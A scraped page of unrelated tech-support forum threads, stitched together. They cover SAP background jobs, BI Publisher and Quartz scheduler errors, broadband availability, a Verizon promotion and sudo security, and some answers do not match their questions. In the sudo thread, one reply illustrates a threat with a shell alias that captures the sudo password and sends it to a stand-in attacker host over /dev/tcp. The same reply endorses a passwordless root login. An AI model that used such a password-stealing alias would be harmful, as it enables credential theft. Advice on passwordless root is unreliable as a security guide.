SupPOUpdate job - who/what is scheduling this?

Hi
We have a job running in our ECC Production system which we can see through SM37 which is failing. The job's name is SupPOUpdate, which is odd as lower case is not actually supported and if we try searching for that job name it can't find it, unless we look for SPOU for example. The job does not appear to be scheduled directly in SAP; there is no 'scheduled' or 'released' jobs in the future yet it runs every day.
We need to cancel it; it runs a Z program which is already scheduled anyway. However, how do you cancel a job that is not scheduled or release anywhere?
It looks as if something else is scheduling this job - but what? It's not Redwood CPS (we do have this but nothing is currently set up in Production). Our PI/XI expert insists that this isn't a job from there.
Any ideas?
Thanks
Ross

Sorry - had to split this into two posts, or the code tags would not work.
If you still can't verify it with the suggestion above, try turning up the trace level 2 times, and check again.  Doing this, I not only see that the RFC_READ_TABLE function module was executed, I also see a hex dump of all the parameters sent along with it (eg: RFC_READ_TABLE was used to read table TBTCO, and all the fields specified).  Looks like this (and there are hundreds more lines I had to truncate):

With tracing two levels up, you should see not only the RFC to kick off the job, but also the job name.  In fact, if you can narrow the tracing time down to a very short period of time, you might try the 2x option first.  Just make sure to turn it back down.  The difference in logging size from 1x to 2x is tremendous.
Hope that helps
Cheers,
David.

  • Schedules Error  - Job execution failed because the user who scheduled this

    Hi
I wonder if anyone can help
I have a report that I can deliver by email through the BI Publsiher front end without issue. However when I call the report to send by email through my oracle 11G Database, as the same BI User I get the following error message
"oracle.apps.xdo.servlet.scheduler.ProcessingException: Job execution failed because the user who scheduled this job has no more permission or priviledge to run the job."
    Any suggestions?
    Thanks
    Kev

The scheduler appears to be the culprit here so try the following:
    1. Open the [repository_home]/Admin/Scheduler/quartz-config.properties file
    2. Add the following entry:
    org.quartz.threadPool.threadsInheritContextClassLoaderOfInitializingThread=true
    3. Restart the environment (xmlpserver)
    4. Rerun the report via the scheduler

  • BPM - Background Job for Reorganization = Not Scheduled

Good afternoon, first of all thank you very much for the support they can provide. I have developed a JDBC interface -> BPM (Multimapping) which works well. Modify a Message Mapping in the BPM that I use for an RFC Lookup, I have added the Configurable Parameters in the BPM and Integration Directory and everything works fine at design time. But when running the interface at run time the message reaches the BPM and the error "error in BPE inbound Permanent processing".
I have reviewed the Business Process Engine in the RWB and the item is Red Schedule Background Job for Reorganization and detail reads: "Background Job for Reorganization = Not Scheduled".
As I can solve this problem. Thank you very much.

  • I receive a Software Update notice that fails. How do I find out who/what is trying to update? How do I stop its attempt to update? The only response allowed is "OK". When OK is selected the window goes away and nothing else happens.

About once a month I receive the Software update notice that has failed. How do I find out who/what is trying to update? If I decided I want this update how do I allow it to continue? If I decided I do not want this update how do I stop it and its attempt to update? The only response allowed is "OK". When OK is selected the window goes away and nothing else happens.

    Hi sharkbiscuit79,
Yes your cabinet 10 on the Crediton exchange has already been installed and linked with a FTTC DSLAM cabinet (making it able to provide FTTC fibre broadband) and has been Accepting FTTC orders since December 2013.  PCP10 (with it's DSLAM cabinet within 100meters of it) is locate on the junction of Commercial Road and the A3072.
However by the looks of things your are just too far away to obtain a FTTC (VDSL2) connection, meaning FTTC fibre broadband is not available to you.
Have a look at the Connecting Devon and Somerset Considerations (particularly the last paragraph) - http://www.connectingdevonandsomerset.co.uk/where-when-map-conditions/
Your best bet is to talk to Connecting Devon and Somerset to see if there are any further plans to get a fibre based service to your area via https://www.connectingdevonandsomerset.co.uk/contact-us/ (as your area may not be inscope of any further deployment). Best give them your full address and landline number too as they can check if you are within a NGA area.

  • Can You Offer Clarity - Who, What, When Your Eligible for Promotional Refund

In our town we have two retailers which are literally blocks mile from each other; Verizon Wireless 76 Dodge St., 01915 and Verizon Wireless at 136 Dodge St., 01915.  I'm sifting through the VWZ website to better understand the promotion and to better understand given the information shared at "Verizon Wireless 136 Dodge St....".
I've been a customer of VWZ for years and have opted not to go to 76 Dodge St. given the years of poor customer service experience at that particular location and return to 136 Dodge St given their great customer service.  Now I read your posting as I comb through the readings to learn more about the promotion to help better understand who, what and under what circumstances you are eligible to receive the promotional upgrade.
I only went to the store today given the VWZ website did not allow me to change my plan to from nationwide to single place and pre-order the phone.  My frustration mounted when I went to the store I was at today stated VWZ "misinformed the public..." and the $200 upgrade really should really have read, "...receive up to a $200 refund..." -- that is, I would only receive the cost of the appraised value of the iPhone 4S which is only know after I submit the item to VWZ.  Here I read this post which you indicate it's only available at "Verizon Wireless" which leaves be baffled - does this include authorized retailers who print receipts stating "Verizon Wireless, 136 Dode St... or what?  The only reason why I remained with VMZ (it wasn't for the customer service), was the promotional offer and the new single plan being offered.  If this is not the case, I like to void this order (which I won't be surprised I'll be charged) and start shopping around at other carriers.  I admit this promotional offering is very clear with no clear indication on who, what and under what circumstance you are eligible and the cost you will encounter.

I mean, isn't it stupid that someone who has my user password can easily get my root access? What is my long, complex root password for?
Later on I even think of more cases where I can jump to a root session with just my user password.---sudo vim ; sudo bash,eg.
Google around and search arch forum didn't give me much.
BTW, I just went across this Linux Journal passage http://www.linuxjournal.com/content/sto … r-password. there is a comment claiming that sudo is not safe.
Anonymous from LinuxJournal wrote: su is a perfectly safe command, sudo is not. When you have work to do, you don't (or shouldn't) have time to find that sudo isn't configured for what you need to do- or worse, that it's misconfigured and you have a glaring security hole on your server. This happens everyday.
So how do you guys think?
I think NOEXEC is the sudo option you're looking for. It prevents sudo processes from spawning child processes, which may or may not be a shell. Use it in conjunction with a specific, known-to-be-secure command line, and you can mitigate the problem you're talking about. Personally, I don't use su nor sudo anymore. Instead I log into my passwordless root account from another TTY, which getty permits by default. su and ssh deny access to passwordless accounts, so I don't really see it as a security problem.
Furthermore, I think your concern is misplaced: if someone had access to your user password, there is far more he or she could do beyond using sudo (install a keylogger, alias sudo='read -p Password > /dev/tcp/attacker.com/1234', gdb(1), ptrace(2), etc). More realistic threats are usually those involving privilege escalation by other users or programs without the use of su/sudo.
Edit: see also man sudo(1) and sudoers.conf(5).

Is there anyone there? I hope there is someone who can you understand this problem and have the common sense to respond?
I open gmail. I want to save an email to one of my folders.
I position my cursor over the appropriate Folder icon or by choice, to the Trash.
The friendly finger pointing cursor icon changes to an arrow icon.
The hand icon allows me flawless access to opening and/or moving emails.
The arrow, however does not open the link.
On the Google menu bar the cursor hand with finger opens the links to Everett (my name), Search, Images, Maps and Play.
When I attempt to open the remaining links in the menu bar (YouTube, News, Gmail, Drive, Calendar and More) the arrow icon replaces the hand. The arrow icon does not work. It will not activate these links.  Nor does it open email messages in the Inbox.
Usually I reset, even reboot Safire and sometimes the problem goes away, then reappears.
Can you imagine if this condition should it happen to a tech savvy Google Support person? Perhaps one can share and make my problem go away.
I am considering dropping Google as my mail source. Unfortunate!

IBM technician have changed the wireless card of my T60, the first few days after it was changed was very fine, no problem at all. About a week later, the problem occured again, and it happened quite frequently after that occurence. Now i really have no idea what is the cause and how to solve it. Will be greatful if there is anyone that can help me.

  • Jobs appearing in "Report Schedules" but remain at status 'Scheduled'

    Hello Folks
We're running Business Intelligence Publisher 10.1.3.4.2 on Linux x86
We are sending jobs to BIP using Oracle APEX communictaing over web service.
    Here are the symptoms
    1. Request document production from within APEX
    2. APEX communicates with BIP over web service
    3. Job appears as scheduled in BIP but never gets processed.
    Additional background
    1. This process has worked for years
    2. It stopped working this month
    3. If I log in to BIP I am able to run the report either in 'View' mode or 'Export' mode
    4. This would suggest that there is nothing wrong with the template, the queries or the ability of BIP to produce a PDF
    5. The issue seems to be when a job is scheduled to burst the PDF files to save in the directtory on the server.
    6. I get the same behaviour as described above whether the job appears in the schedule as a result from a webservice request from APEX or even if I 'Schedule' the job from within BIP itself.
I have pasted some log information below just in case it makes sense to anyone on the forum.
    Any assitance gratefully received.

  • Process Chain - What is Scheduled

I haven't found an easy way to find out what PCs are scheduled to run in the future, i.e. overnite.
I know that from RSPC, I can can click on the "Job Overview" button, and filter only "Released" jobs for a particular date range.  Those jobs all say "BI_PROCESS_TRIGGER", but they don't say much about what they actually are.
Is there an easy way to get a picture of what is scheduled to run, including the PC name or description?

The way that RSPCM is configured on our system, it only shows jobs in the past, not the future.
Can RSPCM be changed to show the future?  Unless I am missing something, RSPCM doesn't seem like a very flexible screen. I don't know of a way to create different views, or customize the view for each user.

In the second step of bootcamp, I am supposed to either check the box where it says create a windows install disk, what exactly is this? Do I need to do this? I have a windows 7 install disk, but I don't know what this means.

If you already have Windows on a DVD or USB drive, you don't have to tick that option. That's only for people who have Windows on a ISO file and have to burn it into a USB drive

  • Jobs remain in status SCHEDULED

    Hi all,
does anyone have an idea what to do when scheduled jobs which should run remain in status SCHEDULED instead of changing into RUNNING? The transaction run if started manually in the workbench.
I will restart MII but hoping to find another way to get the scheduler working. The system is MII 12.0.2.
    Michael

    Hi Nick,
    thanks for your reply.
Actually the save "trick" is the one that mostly cures those problems, but not in my case. The status is correctly set to PENDING after saving the job, but when started again, the job got stuck in status SCHEDULED instead of RUNNING. When I try to run the job directly from the Schedule Editor, it says it has run, but actually it didn't.
I have also tried to stop and start the scheduler, but no change.

  • Add or remove job dynamically in Quartz Scheduler using c#

    Hi,
is it possible to add ,update, remove jobs and trigger to quartz scheduler dynamically.just like reading from database and add jobs and trigger to scheduler .Or using a GUI to add ,edit and remove the jobs and triggers to scheduler while scheduler is running.
please share your ideas and sample.

Hi, As it appears to be a Java library, I suggest you re-ask this question on Quartz Scheduler community forums (http://www.quartz-scheduler.org/community) Regards, Nick.

  • EZ100 16gb what's with this thing????

%[ Okay, bought one of these the other day to replace my iPod 4gb nano, not that there was anything wrong with it, I just want a new player with bigger storage capacity and I went for the Mozaic EZ00 because Argos were selling it for ?69. So, I get it home, charged it up, updated it to the latest firmware and then piled on the music. This is were it seems to go so wrong!!! I'm not impressed at all with the sound quality of this thing, and I was using my expensi've in ear earphones, also the quality of photos and album art is just atrocious, and this is the killer punch...it just keeps on sticking and skipping during playback of every single track!!! I went into recovery mode, did a disc clean up, even reformatted it and again put the music on only this time it only plays the tracks fine when the unit is locked!!!! So, what's with this thing?? This is my first experience of a Creative product and I fear it may be the last, not impressed, will be taking it back to Argos. Anyone else had similar problems?

    (seasons) greetings all!
so out of the blue I get a nano for Christmas (it's blue ;-)) and the person who bought it is in windows but new I ran mac.
unfortunataly he did not know i needed a mac newer than my 3 year old ibook. after years of hearing my boasts of superior macs i hesitate to tell him i cannot use my new gift until i buy a new ibook/macbook... whatever.
i don't really have a question for this post but just wanted to add my comments. what a scam that to get the latest in a music listening gadget your get sucked into the itunes 7 mandantory hence osx.3 mandantory hence your 3 year old still viable and beloved ibook is impotent.
can't believe this may force me to buy a new laptop when there is no other reason. mac products should not have a lifetime of just a few years.
hope everyone else can enjoy their wonderful new mac holiday gifts... i cannot
